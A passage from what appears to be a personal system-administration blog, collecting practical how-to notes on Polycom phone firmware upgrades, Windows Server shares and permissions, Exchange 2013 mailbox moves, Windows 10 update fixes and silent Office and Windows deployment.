It will show all the SHADOWS, if it is created for a builtin provider or for an 3rd party provider. And it will show the provider ID for each shadow.

To add info, you should be able to limit the size of a shadow:

• -computer-management
• -right-click SHARD-FOLDER (on the left-hand side)
• -click SETTINGS for each drive and adjust the size as you see fit.

NOTE: you can also do this on the DISK-MANAGEMENT snap-in.

Upgrading Polycom Phones Across Entire Location

Upgrading all the Polycom phones across an entire location has been a mission. Again, there's so much mis-information and different setups it is hard to weed through it all.

In short, you need 2 files uploaded to your phone-server for each model of phone-set. The 2 files are:

• the sip/uc-software/application (sip.ld) file.

(or if you have a SoundStation 6000/7000, you need the B version here:

2345-12560-001.bootrom.ld

3-Take all the BOOTROM files and upload them to your phone-server (provisioning server) in the tftpboot directory.
(fyi - the tftpboot directory will be at the root of the filesystem: /tftpboot.)
The chart below will show what bootrom goes with what phone-set model.

 FILES DESCRIPTION bootrom.ld Concatenated BootROM 2345-12345-001.bootrom.ld ????? (Probably SoundPoint IP 300/302/320/330) 2345-12360-001.bootrom.ld SoundPoint IP 321 2345-12365-001.bootrom.ld SoundPoint IP 331 2345-12375-001.bootrom.ld SoundPoint IP 335 2345-12450-001.bootrom.ld SoundPoint IP 450 2345-12500-001.bootrom.ld SoundPoint IP 550 2345-12560-001.bootrom.ld SoundPoint IP 560 2345-12600-001.bootrom.ld SoundPoint IP 650 2345-12670-001.bootrom.ld SoundPoint IP 670 3111-15600-001.bootrom.ld SoundStation IP 6000 3111-30900-001.bootrom.ld SoundStation IP 5000 3111-40000-001.bootrom.ld SoundStation IP 7000 3111-19000-001.sip.ld SoundStation Duo 3111-46135-002.sip.ld VVX 300 3111-46161-001.sip.ld VVX 310 3111-46157-002.sip.ld VVX 400 3111-46162-001.sip.ld VVX 410 3111-44500-001.sip.ld VVX 500 3111-44600-001.sip.ld VVX 600 2345-17960-001.sip.ld VVX 1500 3111-36150-001.sip.ld SpectraLink 8440 3111-36152-001.sip.ld SpectraLink 8450 3111-36154-001.sip.ld SpectraLink 8452 3111-33215-001.sip.ld SoundStructure

Great! You are halfway there.

THE SIP.LD FILE

1-First, look at the Polycom Matrix for older phones (ie SOUNDPOINT/SOUNDSTATION phones) here:

Or the Polycom Matrix for newer phones (ie VVX phones) here:

(Hopefully it's obvious, the MS Lync is for MS Lync servers. If you do not know what that is, don't worry about it as it is not the one you need).
(As of this writing the Current General Availability for SOUNDPOINT phone-sets is v4.0.11).

3-unzip the download and inside the folder, you will see SIP.LD files like:
2345-12560-001.sip.ld

4-Take all the LD files and upload them to your phone-server (provisioning server) in the tftpboot directory.

5-Once there, rename the file according to your system. I had to rename the files as such:
sip.SPIP560.4.0.11.revc.ld

REBOOT

Now reboot the phone. It should upgrade the bootrom and then upgrade the application/sip.ld. This process may take around 10 minutes per phone.

If you have a POE switch, you can do this across the network by unplugging the POE switch. Wait about 1 minute. Plug the POE switch back in. Then wait about 15 minutes for all the phone to upgrade.
(Of course, wait for after hours time period.)

CONFIG FILES

From here, there might be some troubleshooting. Namely, some of the old config files may not work with the most recent firmware. Edit the files accordingly in the tftpboot directory.

Each phone will have a MAC-address number on the back. Something like, 0004123EDT78.

So, each phone will have a base-config file of mac-number.cfg. Something like, 0004123EDT78.cfg

This file will determine what SIP.LD file to use and what further config files to use. Before the update, the contents will look something like this:
<APPLICATION APP_FILE_PATH="sip.[PHONE_MODEL].3.2.3.revc.ld" CONFIG_FILES="deviceset-12345.cfg, phone-0004123EDT78.cfg, sip.3.2.3.revc.cfg" MISC_FILES="0004123EDT78-directory.xml" LOG_FILE_DIRECTORY="" OVERRIDES_DIRECTORY="" CONTACTS_DIRECTORY="" LICENSE_DIRECTORY="">
<APPLICATION_SPIP300 APP_FILE_PATH_SPIP300="sip.2.2.ld" CONFIG_FILES_SPIP300="deviceset-12345.cfg, phone-0004123EDT78.cfg, sip.2.2.cfg"/>
<APPLICATION_SPIP500 APP_FILE_PATH_SPIP500="sip.2.2.ld" CONFIG_FILES_SPIP500="deviceset-12345.cfg, phone-0004123EDT78.cfg, sip.2.2.cfg"/>
</APPLICATION>

After the update, you need to edit the file to look something like this:
<APPLICATION APP_FILE_PATH="sip.[PHONE_MODEL].4.0.11.revc.ld" CONFIG_FILES="deviceset-12345.cfg, phone-0004123EDT78.cfg, sip.4.0.11.revc.cfg" MISC_FILES="0004123EDT78-directory.xml" LOG_FILE_DIRECTORY="" OVERRIDES_DIRECTORY="" CONTACTS_DIRECTORY="" LICENSE_DIRECTORY="">
<APPLICATION_SPIP300 APP_FILE_PATH_SPIP300="sip.2.2.ld" CONFIG_FILES_SPIP300="deviceset-12345.cfg, phone-0004123EDT78.cfg, sip.2.2.cfg"/>
<APPLICATION_SPIP500 APP_FILE_PATH_SPIP500="sip.2.2.ld" CONFIG_FILES_SPIP500="deviceset-12345.cfg, phone-0004123EDT78.cfg, sip.2.2.cfg"/>
</APPLICATION>

You can do this file-by-file if needed.

Or you can run one command on the phone-server.

1-make sure you are in the tftpboot directory

2-make a directory for the backup of the files:
mkdir cfgfiles

3-copy all the base config files into this directory:
cp ./000*.cfg ./cfgfiles

4-change all the files at once:
sed -i -e "s/3.2.3/4.0.11/g" ./000*.cfg

This will update all the base-config files to tell the phone-sets to use the new bootrom/updater files.

PHONE OVERRIDE FILES

Phone override files are changes made from the phone-set and are named <MAC Address>-phone.cfg. So something like, 0004123EDT78-phone.cfg

On my phone-server, the older phone override files were named phone-0004123EDT78.cfg

If they have parameters older than v3.3.0, you will get an error message. To fix, see below in the "UPDATE CONFIG FILE WITH UTILITY" section.

WEB OVERRIDE FILES

If you change something via the phone-set web interface, it will save the settings in a web-override file named <MAC Address>-web.cfg. So something like, 0004123EDT78-web.cfg

UPDATE CONFIG FILE WITH UTILITY

If you have an older config file, the Polycom phone-set will give an error. Something like, "phone-0004123EDT78.cfg is pre-3.3.0 params." Basically it is saying that you are trying to config a parameter that doesn't exist.

Consequently, you will have to update your config files to remove those parameters with a software utility called: CFCUtility.

http://support.polycom.com/PolycomService/support/us/support/eula/ucs/UCConfig_agreement.html

Once you download and unzip, you will have to convert the config-files.

-make sure you are in the tftpboot directory.

-make a backup directory:
mkdir cfgphonefiles

-copy all the phone files to this directory:
cp ./phone-* ./cfgphonefiles/

-on a Windows system, in the CFCUtiliy, create a folder called "files".

-gather all the config-files in the folder called "files".
(this can be done by mounting, ftp, scp, etc)

-from a Windows command-line change to the cfcutility folder

-type: cfcUtility.exe -t ./files

-it will ask you some generic questions and accept the default.

-now transfer the files back to the phone-server in the tftpboot directory.

-reboot the phone(s).
(remember, if you have a POE switch unplug the switch and plug back in for a network-wide solution)

-it will reboot 2 or 3 times on it's own.

SUMMARY

In the tftpboot directory, you will have some files for each phone-set:

0004123EDT78.cfg (the update base config. The backup is in the cfgfiles directory)
0004123EDT78-directory.xml
0004123EDT78-phone.cfg (the new phone override, used automatically)
0004123EDT78-web.cfg (the new web override, used automatically)
phone-0004123EDT78.cfg (the old phone override, used by the base-config file. This file is converted and a backup is in the cfgphonefiles directory)

For newer phone-sets with updated firmware versions, simply redirect the provisioning server to: voipt2.polycom.com/<version-number>

1. go to phone
3. change Server Type to HTTP.
4. type: voipt2.polycom.com (for Server Address)
• Example: to load the latest SIP 4.04 = voipt2.polycom.com/404
• Example: to load the latest SIP 4.0.11 = voipt2.polycom.com/4011
5. reboot the phone-set
6. wait 15 minutes
7. once updated, change the server back to the local provisioning-server

For a current live directory list go here:
http://voipt2.polycom.com/WEBCONTENT/directory.html

NOTES:

-the config files are explained here: http://documents.polycom.com/topics/139356

Update the ADMX Templates in Windows Server to Apply GPO to Windows 10

Updating the ADMX Templates in Windows Server to Apply GPO to Windows 10 is a manual process. A Windows Server can control Windows client computers through Group Policy/Group Policy Objects (GP/GPO). It does this through template files called ADMX files. These ADMX files simply correspond to registry-edits (regedits).

Since not all regedits are available on OS versions (for example, controlling OneDrive was included along the way), there is a set of ADMX files for common milestones like:

• -Windows 7
• -Windows 7 SP1
• -Windows 8
• -Windows 8.1
• -Windows 10
• -Windows 10 (1511)
• -Windows 10 (1607) Anniversary Update

The ADMX files are not automatically updated on the Windows Server. They must be manually updated. The updates are in MSI files (and not zipped files). The instructions are pretty simple once someone shows you:

• -install the ADMX msi (this will unpack the ADMX files in a folder called "Policy Definitions").
• -copy the entire contents to: C:\Windows\SYSVOL\sysvol\domain-name\Policies\PolicyDefinitions\

You can find the ADMX files here:

-Windows 10 (1511)

-Windows 10 (1607) Anniversary Update

This video explains it better than I can:

Creating Shares On Server 2012

Many experience admins get this wrong. Here's how to do it right.

There are a 5 parts to this.

CREATE THE GROUP

• -click ACTIVE-DIRECTORY-USERS-AND-COMPUTERS.
• -create an GROUP (aka SECURITY-GROUP).

CREATE THE SHARE

• -create a folder.
• -right-click to PROPERTIES > SHARING.
• -checkmark SHARE-THIS-FOLDER.
• -if hidden, add a $at the end. ADD SHARE PERMISSIONS • -click PERMISSIONS. • -remove all groups/users. • -add the GROUP required for this share. • -checkmark FULL-CONTROL. • -click OK > OK. ADD NTFS PERMISSIONS • -click SECURITY tab (at the top). • -click ADVANCED (at the bottom). • -click DISABLE ENHERITANCE. • -click CONVERT INHERITED PERMISSIONS INTO EXPLICIT PERMISSIONS. • -remove all groups/users except SYSTEM. • -add the GROUP required for this share. • -checkmark FULL-CONTROL. • -click OK > APPLY. TEST PERMISSIONS • -click the EFFECTIVE ACCESS tab (at the top). • -test the user/group you want to make sure can access. NOTES: • -the EVERYONE group does not include everyone. This is why it should not be used. • -the most restrictive permissions win. • -the group is assigned to the user upon login. Consequently, the user will have to logout and login again to test if the share is working. Find the FSMO in Your Domain You have multiple servers. Despite there being a sync between them, only one can be the master for certain operations. For example, only one server can hold the official invitation list. The other bouncers will have to check the master list. This master is called the FSMO. So how do you know which server is the FSMO? How do you find the FSMO in your domain? Here's how: • open cmd • type: netdom query fsmo You can also: • -open ACTIVE-DIRECTORY-USERS-AND-COMPUTERS. • -right-click on the domain-name (on the left-hand side). • -click OPERATIONS MASTER. • -it should show you there as well. At the different tabs at the top, you can select which OPERATION you are interested in. There are other ways as well. Black Screen of Death on Windows 10 v1607 Update (aka Anniversary Update - a Feature Update) Black Screen of Death on Windows 10 v1607 Update (aka Anniversary Update - a Feature Update) upon reboot. The only way to get out of it is to power down the computer. Upon reboot, the computer will revert to the previous version of Windows 10 v1511. So how to get Windows 10 v1607 Update (aka Anniversary Update) to install? -start the update. -manually reboot to finish. -before it reboots, unplug the USB dongle for the Logitech wireless mouse or wireless keyboard. -the update will install. Intel HD Graphics on Windows 10 64-bit In the spirit of "just show me how to fix it" I will be succinct. The older Intel HD Graphics 3000 (or Sandy Bridge) is no longer working in WINDOWS-10(v1607). It used to work in WINDOWS-10(v1511) but INTEL is pushing foreword. The same is true for Intel HD Graphics 2000 and HD Graphics. This is basically the Intel 6 Generation Chipset. -Intel refuses to produce drivers for this graphics card on it's own but has released a driver and provided it to MS. -the driver is version 9.17.10.4459. -the driver has to be gotten from MS and not from INTEL: http://catalog.update.microsoft.com/v7/site/Search.aspx?q=9.17.10.4459 (it is named: 200028694_9f1eae50bc588760715acd70172f5487dc461e64) CASE-1 -INTEL GRAPHICS HD 3000 -black screen of death trying to update to WIN-v1607. -the driver is v9.17.10.4299. -had to manually untar the cab. -had to manually update the driver to v9.17.10.4459 -also installed the latest CHIPSET driver for QM67 (intel 6 series). CASE-2 -INTEL GRAPHICS HD 2000 -black screen of death trying to update to WIN-v1607. -the driver is v9.17.10.4299. -had to manually untar the cab. -had to manually update the driver to v9.17.10.4459 -also installed the latest CHIPSET driver for Q65 (intel 6 series). CASE-3 -INTEL GMA 4500 (g41 chipset) -black screen of death trying to update to WIN-v1607. -the driver is v8.15.10.2702 -make sure KB3176938 is installed. NOTES: -use HWINFO to find out details of your computer. -https://en.wikipedia.org/wiki/List_of_Intel_graphics_processing_units -https://en.wikipedia.org/wiki/List_of_Intel_chipsets Office365 Options Office365 has many options and it can be confusing on their web site. Here's an easy to read all-in-one page to quickly identify your needs:  EXCHANGE-1 EXCHANGE-2 OFFICE-365-ESSENTIALS OFFICE-365-BUSINESS OFFICE-365-PREMIUM OFFICE-365-PROPLUS OFFICE-365-E1 OFFICE-365-E3 OFFICE-365-E5 cost-montly$4.00 $8.00$5.00 $8.25$12.50 $12.00$8.00 $20.00$35.00 cost-annual $48.00$96.00 $60.00$99.00 $150.00$144.00 $96.00$240.00 $420.00 exchange YES YES YES NO YES NO YES YES YES mailbox-size 50GB 100GB 50GB 0GB 50GB 0GB UNLIMITED UNLIMITED UNLIMITED apps-online NO NO YES YES YES YES YES YES YES apps-desktop NO NO NO YES YES YES NO YES YES onedrive NO NO YES YES YES YES YES YES YES onedrive-size 0TB 0TB 1TB 1TB 1TB 1TB 1TB 1TB 1TB shared contacts YES YES YES NO YES NO YES YES YES shared calendar YES YES YES NO YES NO YES YES YES maximum users UNLIMITED UNLIMITED 300 300 300 UNLIMITED UNLIMITED UNLIMITED UNLIMITED NOTES: Exchang 2013 Change Primary SMTP Email Address Exchang 2013 Change Primary SMTP Email Address You might get the following, "Couldn't update the primary SMTP address because this mailbox is configured to use an e-mail address policy." Here's how to fix: Set-Mailbox foo.user -PrimarySmtpAddress This e-mail address is being protected from spambots. You need JavaScript enabled to view it -EmailAddressPolicyEnabled$false

Or if you need to set all the addresses for one mailbox all at once (the captial SMTP is the primary smtp address and the lowercase smtp is the additional smtp email addresses):

Set-Mailbox foo.user -EmailAddresses smtp:foo.user@domain1, smtp:foo.user@domain2, SMTP:foo.user@domain3 -EmailAddressPolicyEnabled $false Grab All The Photos From A Web Site So you want to grab all the photos from a web site do you? Here's how: wget -nd -r -A jpg -e robots=off http://wherever.tld This will put all the photos from the web site you reference (and all lower directories) to a single directory. This will not magically grab photos from a directory which has no page attached to it and has random names. If you do know the names are sequential numbers then you can try: wget -nd -r -A jpg -e robots=off http://wherever.tld/gallery/{0..1000}.jpg Create a ZIP File in Linux Create a ZIP file in Linux. This will create a ZIP file called foo.zip that contains all of the documents in the current directory. zip foo.zip ./* Exchange 2013 Move Mailbox From One Database to Another Database Here's the command to move a mailbox from one database to another database: New-MoveRequest foo.user -TargetDatabase "Mailbox XYZ" Here's how to do a batch based on last name letter: Get-mailbox -Database "Mailbox-Foo1" -ResultSize Unlimited |get-recipient -RecipientType UserMailbox -Filter {lastname -like 'h*'} |get-mailbox |New-MoveRequest -TargetDatabase "Mailbox-Foo2" -BatchName "Foo-batch" Here are the diagnostic short list: get-moverequest get-moverequeststatistics remove-moverequest foo.user (get-moverequest).count SPEED TWEAKS ON HOW TO MOVE MAILBOXES FASTER I have found that moves are slow unless they are set as EMERGENCY. Here's how: set-MoveRequest foo.user -priority emergency Also, some have found that turning off the MRS (throttling) improves performance. I haven't tried it. Here's how: reg query "HKLM\SYSTEM\CurrentControlSet\services\MSExchange ResourceHealth" /v MRS :: TURN OFF MRS echo y | reg add "HKLM\SYSTEM\CurrentControlSet\services\MSExchange ResourceHealth" /v MRS /d 0 :: STOP EXCHANGE REPLICATION SERVICE sc stop MSExchangeRepl :: TURN ON MRS echo y | reg add "HKLM\SYSTEM\CurrentControlSet\services\MSExchange ResourceHealth" /v MRS /d 1 :: START EXCHANGE REPLICATION SERVICE sc start MSExchangeRepl SEE WHAT'S HAPPENING Here's how to see how the full list: Get-moverequest |get-moverequeststatistics |sort-object -Property PercentComplete -descending Here's how to see how many have finished: (Get-MoveRequest -movestatus completed).count Here's how to see how many are in progress: (Get-MoveRequest -movestatus inprogress).count Here's how to see how the normal-moves are going: Get-moverequest -movestatus inprogress |get-moverequeststatistics |sort-object -Property PercentComplete -descending Here's how to see how the emergency-moves are going: Get-moverequest -movestatus inprogress -flags highpriority |get-moverequeststatistics |sort-object -Property PercentComplete -descending WHAT TO DO WITH "FAILED" MOVES If move requests fail, you can see why. Here's how: get-moverequeststatistics -includereport foo.user |fl Usually a single bad item. You can set the move to raise the badlimit just a little and restart the move with the following: get-moverequest foo.user |set-moverequest –baditemlimit 10 -priority emergency resume-moverequest foo.user EXCHANGE 2013 Mailflow Stop After Update is Cancelled Cancel EXCHANGE update (CU13) because it requires a HOTFIX (or two) before it continues. Afterwards, OUTLOOKs are disconnected; OUTLOOK-WEB-ACCESS works; sending & receiving email doesn't work. Hmmmm.... what to do. Checking the WINDOWS logs and I see: "Failed to discover Ews Url for mailbox" Then I check for the EXCHANGE COMPONENT STATUS: • Get-ServerComponentState –Identity ServerNameHere This will tell you the state of the server components in an ACTIVE/INACTIVE way. If something is INACTIVE, you can turn it to ACTIVE by: • Get-ServerComponentState –Identity ServerNameHere -Component ServerWideOffline -State Active -Requester Functional • sc stop MSExchangeTransport • sc stop MSExchangeFrontEndTransport • timeout 80 • sc start MSExchangeTransport • sc start MSExchangeFrontEndTransport It should turn back to ACTIVE. However, if there was a second REQUESTER making the change to INACTIVE, this REQUESTER must also set to ACTIVE for the whole status to be ACTIVE: • Get-ServerComponentState –Identity ServerNameHere -Component ServerWideOffline -State Active -Requester Maintenance • sc stop MSExchangeTransport • sc stop MSExchangeFrontEndTransport • timeout 80 • sc start MSExchangeTransport • sc start MSExchangeFrontEndTransport Another way to fix this is to install the HOTFIXES that are needed and then proceed with the EXCHANGE update. Wait about an hour or so and viola! Working server automatically. Apparently, the EXCHANGE update automatically turns off some of the components. If the update is canceled, these components are left in the INACTIVE state. Going through the update process turns the components to the ACTIVE state automatically. NOTES: -https://blogs.technet.microsoft.com/exchange/2013/09/26/server-component-states-in-exchange-2013/ -google: "Failed to discover Ews Url for mailbox" -google: "ServerWideOffline" -to test mail flow use: Test-Mailflow -TargetEmailAddress This e-mail address is being protected from spambots. You need JavaScript enabled to view it How to Enable DOTNET 3.5 on Windows 10 BACKGROUND DOTNET is a computer language. If it is installed on you, you can speak it and understand it. DOTNET is to MICROSOFT what JAVA is to SUN/ORACLE. There are certain versions of DOTNET that automatically come with certain versions of WINDOWS. They are as follows:  DOTNET VERSION DATE WINDOWS VERSION 1.0.0 02/13/02 XP 1.1.0 04/24/03 N/A 2.0.0 11/07/05 N/A 3.0.0 11/06/06 Vista 3.5.0 11/19/07 7 4.0.0 04/12/10 N/A 4.5.0 (378389) 08/15/12 8 4.5.1 (378675/378758) 10/17/13 8.1 4.5.2 (379893) 05/05/14 N/A 4.6.0 (393295) 07/20/15 10 4.6.1 (394254) 11/30/15 10 v1511 (November Update) 4.6.2 (394802) 08/02/16 10 v1607 (Anniversary Update) 4.7.0 (460798) 04/11/17 10 v1703 (Creators Update) 4.7.1 (461308) 10/17/17 10 v1709 (Fall Creators Update) DOTNET can be installed in parallel with other versions. For example, v3.5 can be installed with v4.0. Certain versions of DOTNET are required for certain software to run. If something is built to run off of v3.5, this doesn't mean it will work with v4.6.2. Starting with WINDOWS 10, DOTNET v4.6.0 is included. DOTNET v3.5 (including v2 & v1) is included in WINDOWS 10 as a "feature" but it is not installed/enabled. TO SEE IF DOTNET 3.5 (v2 & v1) IS INSTALLED ON WINDOWS 10 • -click START > RUN • -type: cmd • -type: DISM /Online /get-features /Format:Table This will list out all the features of WINDOWS 10 and their status. You are looking for NETFX3. This is DOTNET v3.2 (v2 & v1). ENABLE DOTNET v3.5 (v2 &v1) If it is not enabled, you will need to enable it. • -click START > RUN • -type: cmd • -type: DISM /Online /Enable-Feature /FeatureName:NetFx3 /All Or for an OFFLINE installation where you have the source CD/DVD/USB/WIM: • DISM /Online /Enable-Feature /FeatureName:NetFx3 /All /LimitAccess /Source:c:\path\to\Windows10x64\sources\sxs FIND DOTNET VERISION To find the DOTNET version: • -type: Get-ChildItem "hklm:SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full\" or • -type: reg query "hklm\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\full" /v Release This will give the value in HEX. You have to convert the HEX number to DEC. This will give a RELEASE value that corrosponds to a VERSION number. See the chart above. WINDOWS PERMISSIONS WITH ICACLS WINDOWS permissions with icacls. When permissions in WINDOWS is FUBAR'd, start from scratch by resetting the permissions as they would be if nothing has changed. RESET PERMS FOR DIR RECURSIVELY icacls folder-name-here /t /reset Now, from this point if you would like to add a USERNAME or GROUPNAME: ADD FULL PERMS FOR DIR RECURSIVELY (doesn't change existing) icacls folder-name-here /grant username-or-groupname:f /t If you want to set permissions explicitly as you tell it to: REMOVE INHERITANCE | GRANT USERNAME | (CI) ENSURES NEW ITEMS WILL HAVE THESE PERMS (changes everything from scratch) icacls foo-folder /inheritance:r /grant username:(ci)f /t EXAMPLE (This is probably what you want. The SYSTEM, OWNER, ADMINISTRATORS all have FULL CONTROL. The USERNAME has READ-ONLY-CONTROL). icacls foo-dir /inheritance:r /grant "creator owner":(CI)(CI)F system:(CI)(CI)F administrators:(CI)(CI)F other-username-for-full-control:(CI)(CI)F other-groupname-for read-control:(CI)(CI)RX /T BONUS: If you need to take ownership beforehand, you can do so by the following: takeown /f top-folder-name /r /d y or: takeown /f "c:\foo folder" /r /d y How To Find .Net Version Installed | How To Find the Powershell Version Installed Find .Net Version installed on your computer or to find the Powershell version installed on your computer: • -open POWERSHELL • -type:$PSVersionTable

The CLRVersion is the .NET version in "version name." If you want to know what it is in "product name" type it into google.

The PSVersion is the Powershell version installed.

How to Checksum Files in Windows 10

How to Checksum Files in Windows 10. There are a few ways to CheckSum files in Windows 10 listed in the great wide open of the internet.

They are as follows:

fciv (outdated from 2004)

fciv -md5 d:\programs\setup.exe

certutil (built into Windows)

CertUtil -hashfile C:\TEMP\MyDataFile.img MD5

get-filehash (built into PowerShell v4 and higher)

get-filehash -algorithm md5 <file_to_check>

other tools
There are other tools out there but I prefer to stick with what's built into the OS and released/blessed from the OS author.

Access RAPIDSSL Certificates

To access your RAPIDSSL certificates or your GEOTRUST certificates, you can login to their END USER PORTAL here:

This is kinda hidden since typically RAPIDSSL only sells to resellers and pushes all support through them, so I'm making a note of it.

SQL Server 2014 High CPU After Installing SP2

SQL Server 2014 High CPU After Installing SP2. There are 3 steps I used to fix this:

STEP 1: find the username of the SQL

• -open "SQL Server 2014 Configuration Manager."
• -right-click on the instance of SQL that you are running.
• -click PROPERTIES (a box opens).
• -click LOG-ON tab (at the top).
• -take note of the USERNAME that is running.
• -click OK
• -exit out of "SQL Server 2014 Configuration Manager."

STEP 2: add the username to the LOCK PAGES IN MEMORY section

• -click START > RUN
• -type: gpedit.msc
• -click COMPUTER-CONFIGURATION > WINDOWS-SETTINGS > SECURITY-SETTINGS > LOCAL-POLICIES > USER-RIGHTS-ASSIGNMENT
• -find LOCK-PAGES-IN-MEMORY
• -type in the USERNAME from above.

STEP 3: adjust the MAX MEMORY

• -open the 2014 MANAGEMENT STUDIO
• -login to the SQL DATABASE you are running.
• -right-click the SQL DATABASE name (at the top, on the left-hand side)
• -click PROPERTIES
• -click MEMORY (on the left hand side).
• -you will see the MINIMUM SERVER MEMORY and the MAXIMUM SERVER MEMORY areas.
• -leave the MINIMUM SERVER MEMORY at 0 (zero).
• -find the MAXIMUM SERVER MEMORY box.
• -type in the number for your server. This number is based on the amount of RAM in your system.
• -the chart is here: https://www.brentozar.com/blitz/max-memory/
• -click OK.

That's it!!! You did it!!!

Windows 10 Product Key

slmgr /ipk xxxxx-xxxxx-xxxxx-xxxxx-xxxxx

Of course, replace your product key here.

This didn't work for me for some reason. I had to go traditional gui route and that worked. Same product key.

WOL Control

Waking remote computers with WOL. As usual, the options are dizzying. Here's a cheat sheet.

See what's capable:

powercfg -devicequery wake_from_any

But this list is too long. Since not all devices can be config'd, some devices are going to wake whether the user wants them to or not. So to see what's capable of being user config'd (what can be changed):

powercfg -devicequery wake_programmable

See what's enabled:

powercfg -devicequery wake_armed

And finally, to enable a device to be a waking point:

POWERCFG -deviceenablewake "exact device name here"

A quick batch script would be:

POWERCFG -devicequery wake_from_any | FINDSTR /i "net" > c:\foo\adapters.txt
FOR /F "tokens=*" %%i IN (c:\foo\adapters.txt) DO POWERCFG -deviceenablewake "%%i" 

Manage Printers via Command Line

Manage printers via command line:

• Get the default printer details from command line:

• Get the list of printers added to the system from Windows command line:

• Set default printer from windows command line:

Install Windows 10 In-Place Upgrade on All Computers in a Domain With PDQ Deploy

Install Windows 10 In-place upgrade on a domain is possible in a couple of ways.

The official way is to use the MICROSOFT DEPOLYMENT TOOLKIT found here: https://technet.microsoft.com/en-us/windows/dn475741.aspx

The other way is through simple network share.

Wait... what? Yes, network share.

• -you will see 4 options
WINDOWS 10 (all languages)
WINDOWS 10 K (Korean law)
WINDOWS 10 N (European law)
WINDOWS 10 SINGLE LANGUAGE (1 language only)
• -simply download the one you need. The one that matches what you have now which is probably WINDOWS 10 ALL LANGUAGES.
• -again, since you are doing an IN-PLACE UPGRADE, the ISO must match what's on your system now. Many of the issues people are having is that they are trying to upgrade their system with a WINDOWS 10 PRO SINGLE LANGUAGE when they have WINDOWS 7 ALL LANGUAGES installed on their machine.
• NOTE: do NOT use the MEDIA-CREATION-TOOL for this exercise.

STEP 2: mount WINDOWS 10 ISO

This means show the files that are in the ISO. Windows 7 cannot do this without some help such as WINRAR, 7ZIP or VIRTUAL-CLONEDRIVE. WINDOWS SERVER 2012, WINDOWS 8.1 and newer can do this without additional software. This can happen either through the GUI or through POWERSHELL command MOUNT-DISKIMAGE.

There is no correct way on how you mount the ISO, just do it.

STEP 3: create the network share

Create the share:

• md C:\installs\os\win10x64\unpack

STEP 4: copy the ISO contents onto a created network share.

I use ROBOCOPY to do this. It is built into WINDOWS 7 and newer. Something like:

• robocopy /e f:\ C:\installs\os\win10x64\unpack

STEP 5: Build your install package

Pretty easy when you know what to do it right.

• -select the setup.exe on the network share. Something like: \\myserver\installs\os\win10x64\unpack\setup.exe
• -type in the parameters: /auto upgrade /Compat IgnoreWarning /installfrom c:\Windows\AdminArsenal\PDQDeployRunner\service-1\exec\sources\install.wim /dynamicupdate disable /showoobe none /quiet
NOTE: if you would like, you can save the log files as well. Add the following to the end of the parameters above: /copylogs \\myserver\installs\os\win10x64\logs
• -checkmark "Include Entire Directory"
• click PACKAGE PROPERTIES
• make sure the COPY MODE is changed to PULL (not PUSH).
• checkmark "use custom timeout" and change the number to 240.
• save the package.

STEP 6: deploy on test victim.

That should do it!!! If the test pc works, deploy to the rest of the pc's how you see fit.

==============================================================

If for some reason the above PDQ package fails, you can create a .bat file and fill it with following (adjust as necessary):

:: MAKE DIRECTORY.
md c:\installs\Windows10x64

:: COPY FILES.
robocopy /MIR \\myserver\installs\os\win10x64\unpack\ c:\installs\Windows10x64

:: CHANGE DIRECTORY.
cd c:\installs\Windows10x64

:: START THE IN-PLACE UPGRADE (OR CLEAN INSTALL).
start /wait setup.exe /auto upgrade /Compat IgnoreWarning /installfrom c:\installs\Windows10x64\sources\install.wim /dynamicupdate disable /showoobe none /quiet

• Save this .bat in \\myserver\installs\os\win10x64\unpack\
• Then create a PDQ package with this bat.
• Deploy as you see fit.

Office 2010 "You don't have permission to open this file."

You also might get, "filename.xls could not be found."

-disable Panda's DATA SHIELD.

Panda's Cloud free antivirus has a new component called Data Shied. Disable the DATA SHIELD and it will fix the issue.

Automatically Install Office 2016 to Domain Network

• -mount ISO.
• -copy contents to network share.
• -config (product key, org name, etc).
• -click FILE SAVE.
• -save the MSP file at the network share.

This will automatically deploy OFFICE 2016 to domain PC's of your choosing. And it's completely silent.

This process is how network administration should be done! Not "proof of concept" stuff along with long winded instruction sets.

HDMI Cable Speeds

2160/60p, 4:2:0, 8-bit, 8.91Gbps
2160/60p, 4:2:0, 10-bit, 11.14Gbps
2160/60p, 4:2:0, 12-bit, 13.37Gbps
2160/60p, 4:2:0, 16-bit, 17.82Gbps
2160/60p, 4:2:2, 8-, 10- or 12-bit, 17.82Gbps
2160/60p, 4:4:4, 8-bit, 17.82Gbps
4320/60p, 4:4:4, 12-bit, ~72Gbps

HDMI CERTIFICATE TYPES

Standard (or "category 1"), no Ethernet;
High Speed (or "category 2"), no Ethernet;
Standard, with Ethernet;
High Speed, with Ethernet;

Full Disclosure: I have an AudioQuest cable. Picked it up at a conference as a freebie ;-)

ErrorCode: 1603(0x643) | Office 2010 Won't Install on Windows 10 | CAInitSPPTokenStore.x86: Error: Failed to initialize the SPP Token store. HResult: 0x80070057

WINDOWS 10 is having trouble installing software. This is a complex issue but basically some software won't install (or updates won't install) because of an ERROR 1603. More specifically: ErrorCode: 1603(0x643).

Turning on VERBOSE logging (check another article but it puts the logs in %user%\appdata\local\temp) for the install, it shows that the actual error is: CAInitSPPTokenStore.x86: Error: Failed to initialize the SPP Token store. HResult: 0x80070057. Hmmm... What to do?

• -click START > RUN > REGEDIT
• -navigate to: hkey_local_machine/software/microsoft/windows nt/currentversion/profilelist

Nested underneath, you will see SID's. Somthing like:

• s-1-5-18
• s-1-5-19
• s-1-5-20
• s-1-5-21-...1000
• s-1-5-21-...1003
• s-1-5-82

To see what SID's corrospond to actual accounts.

• -type: wmic useraccount get name,sid

You'll see something like:

• 1000 owner
• 1003 tempfix

Notice that s-1-5-18, s-1-5-19, s-1-5-20 do not show. So what's up? Well, this is because these are system-accounts that are not be used/seen. This is what we are concerned about. They are as follows:

• s-1-5-18 is SYSTEM
• s-1-5-19 is LOCAL SERVICE
• s-1-5-20 is NETWORK SERVICE

Next, go back to regedit to: hkey_users

A DEFAULT NORMAL INSTALL has something like:

• S-1-5-18
• s-1-5-19
• s-1-5-20
• s-1-5-21-...1215
• s-1-5-21-...1216
• s-1-5-21-...1217

What we are seeing is that some of the upgrades to WINDOWS 10 are BROKEN and has the following:

• s-1-5-18
• s-1-5-19
• s-1-5-21-...1000
• s-1-5-21-...1003

So, it is missing s-1-5-20. Here's how to fix:

• -start > all-programs> accessories
• -right click COMMAND-PROMPT > run-as-administrator
• -type ren C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT *.OLD
